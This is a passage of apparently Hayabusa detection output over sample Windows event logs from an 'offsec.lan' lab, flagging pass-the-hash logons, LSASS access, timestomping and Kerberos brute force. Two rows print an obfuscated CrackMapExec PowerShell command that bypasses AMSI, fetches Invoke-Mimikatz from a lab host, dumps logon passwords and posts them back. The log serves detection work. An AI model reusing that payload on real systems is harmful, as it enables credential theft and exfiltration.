Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.137 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b29,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.137 +00:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.168 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b4e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.246 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b70,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.309 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.371 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157bac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.635 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 117,114,105, 116 ,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 ,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 ,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: FS03VULN$ | LID: 0x3e4",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.635 +00:00,fs03vuln.offsec.lan,4688,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,rules/sigma/process_creation_builtin/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.635 +00:00,fs03vuln.offsec.lan,4688,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation_builtin/proc_creation_win_set_policies_to_unsecure_level.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.635 +00:00,fs03vuln.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.651 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 117,114,105, 116 ,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 ,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 ,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x90c | User: admmig | LID: 0x8157bac",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.651 +00:00,fs03vuln.offsec.lan,4688,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,rules/sigma/process_creation_builtin/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.651 +00:00,fs03vuln.offsec.lan,4688,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation_builtin/proc_creation_win_set_policies_to_unsecure_level.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.651 +00:00,fs03vuln.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.651 +00:00,fs03vuln.offsec.lan,4688,high,Exec,Suspicious PowerShell Parameter Substring,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_suspicious_parameter_variation.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:30.651 +00:00,fs03vuln.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-23 09:26:45.843 +00:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x214 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" +2021-11-24 15:48:24.985 +00:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx +2021-11-24 15:48:25.000 +00:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx +2021-11-27 15:47:00.365 +00:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx +2021-11-27 15:47:00.369 +00:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx +2021-11-30 22:05:47.229 +00:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\287ded39f444f2847a5175b4bf51f9c9\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=4F4193BFF5970968B6EEAD58EB83F9415F32A5C1,MD5=9139657B434F2FA8023775958164DB0C,SHA256=EE9CD13CC38A285D48B00E21CBB11F9CA8C8F435ADF6ADF5281C371DD0A406AA,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:50.065 +00:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=1663A59FF35A01F612C878AB83F2AD242BB46FB6,MD5=FC2036AB90490D8FDFB3B3F3B90AF56F,SHA256=E293B79E4C06E8DEFD95F3CB9B70BA1CC50E83C37930DA802B50066AC6DF0509,IMPHASH=77B4BD4D7F94DBB1235EEE9E8C0737DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:50.065 +00:00,fs03vuln.offsec.lan,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/image_load_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:50.864 +00:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62095 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:50.864 +00:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:59.943 +00:00,fs03vuln.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 2668 | Src PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Tgt PID: 480 | Tgt PGUID: A57649D1-92D8-61A4-7191-000000000000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:59.943 +00:00,fs03vuln.offsec.lan,10,high,CredAccess,LSASS Memory Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:59.943 +00:00,fs03vuln.offsec.lan,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:59.943 +00:00,fs03vuln.offsec.lan,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/proc_access_win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:05:59.943 +00:00,fs03vuln.offsec.lan,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/proc_access_win_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:06:02.033 +00:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62096 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-11-30 22:06:02.033 +00:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx +2021-12-02 14:48:15.983 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test1 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx +2021-12-02 14:48:15.983 +00:00,-,-,medium,InitAccess : PrivEsc,Invalid Users Failing To Authenticate From Source Using Kerberos,"[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:46 TargetUserName:g/go/ugu/vrat/admtest/uydzry/ytuntsr/mgdi/ar/dyfgdhbn/b aer/xt/yvas/bdcy/xc/ryver/s/vt/vay/vs/tfay/wyt/rec/nini/syvsdy/bsfin/tc/gsdf/vase/test2/yvsyv/sef/sfs/tary/ysy/accrt/rey/sgfg/srey/test1/m,og/nd/vga/tbyt/vdr/xvtrz IpAddress:::ffff:10.23.123.11 timeframe:24h",rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos3.yml,- +2021-12-02 14:48:16.298 +00:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: 